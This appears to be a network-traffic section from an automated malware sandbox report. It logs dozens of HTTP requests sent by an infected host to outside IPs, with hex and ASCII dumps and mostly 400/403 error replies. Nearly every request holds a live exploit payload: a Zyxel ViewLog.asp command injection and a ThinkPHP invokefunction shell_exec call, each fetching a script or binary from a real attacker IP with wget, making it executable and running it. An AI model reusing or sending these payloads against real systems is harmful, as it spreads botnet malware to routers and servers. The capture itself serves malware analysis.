                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        633192.168.2.144893295.86.97.518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:18.612875938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        634192.168.2.1438120112.170.221.17380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:20.262495041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:20.552882910 CET512INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:34:22 GMT
                                                        Server: lighttpd/1.4.54
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        635192.168.2.144123031.136.15.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.122370958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:25.125777960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:31.269540071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:43.301196098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.876040936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:57.026542902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        636192.168.2.145950462.29.109.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.148916960 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        637192.168.2.145488831.0.246.2448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.183444977 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        638192.168.2.144196895.86.66.318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.438498974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        639192.168.2.144455888.159.26.14480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.752093077 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:22.950620890 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        640192.168.2.145880088.119.170.23080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.754060030 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:22.954339027 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:22 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        641192.168.2.143875688.225.216.380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.835979939 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        642192.168.2.145314295.100.77.23780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:22.953227043 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:23.157845974 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 30 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 36 36 33 26 23 34 36 3b 34 66 35 66 32 36 66 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;907a7b5c&#46;1707899663&#46;4f5f26f8</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        643192.168.2.143342895.217.53.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.056883097 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:23.277247906 CET499INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Server: Apache/2.4.25 (Debian)
                                                        Content-Length: 305
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 39 39 2e 31 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at 192.168.99.18 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        644192.168.2.145581695.100.188.11280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.059253931 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:23.282557011 CET478INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 256
                                                        Expires: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 33 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 36 33 26 23 34 36 3b 34 62 64 30 63 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e3d1f557&#46;1707899663&#46;4bd0ca</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        645192.168.2.145902895.215.156.6180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.063626051 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:23.291554928 CET506INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:23 GMT
                                                        Server: Apache/2.4.54 (Debian)
                                                        Content-Length: 312
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6d 6f 6e 32 2e 6e 65 74 77 6f 72 6b 2e 6c 76 69 76 2e 75 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Debian) Server at mon2.network.lviv.ua Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        646192.168.2.144279662.221.67.1068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.157347918 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:23.402363062 CET224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        647192.168.2.143739094.122.88.888080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.168210030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        648192.168.2.144952895.101.51.11880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:23.273252010 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
